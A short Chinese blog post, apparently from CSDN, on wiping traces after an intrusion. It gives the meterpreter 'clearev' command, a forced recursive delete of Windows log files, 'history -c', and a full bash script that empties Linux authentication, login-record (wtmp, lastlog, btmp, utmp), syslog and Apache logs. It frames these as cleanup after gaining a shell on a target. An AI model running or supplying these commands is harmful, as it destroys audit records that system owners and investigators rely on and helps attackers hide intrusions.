win+linux 日志清除

本文介绍了如何在Windows和Linux系统中清理日志文件,包括使用事件查看器和meterpreter命令来清除Windows日志,以及编写脚本清空Linux的各种系统和服务日志。同时提到了清理Apache服务日志和Linux历史命令的重要性,这些操作通常需要管理员权限。
摘要由CSDN通过智能技术生成

       本文仅当作记录使用,方便后期查找。

       仅本地清理,如果目标服务存在日志服务器的话,所有日志还会被保留。这里仅清理系统相关日志如果访问了某些服务,比如说通过 apache 服务获得一个 shell,你还需要清理apache 服务的访问日志。

windows日志清除

       打开cmd输入eventvwr 可打开事件查看器。

       在 meterpreter中提供了一条命令clearev可清除日志

       删除系统日志目录下的一些日志文件。

        del %WINDIR%*.log /a/s/q/f

 

linux 清除日志

        Linux 可能根据发行版本不同,日志文件名称也有所不同,所以具体清除需要大家先看一下目标操作系统;删除日志时注意文件是否有执行权限,而且删除日志一般只有root权限才有。

清除历史命令   history -c

汇总脚本
root@jilu:~# cat clearlog.sh

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
history -c

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值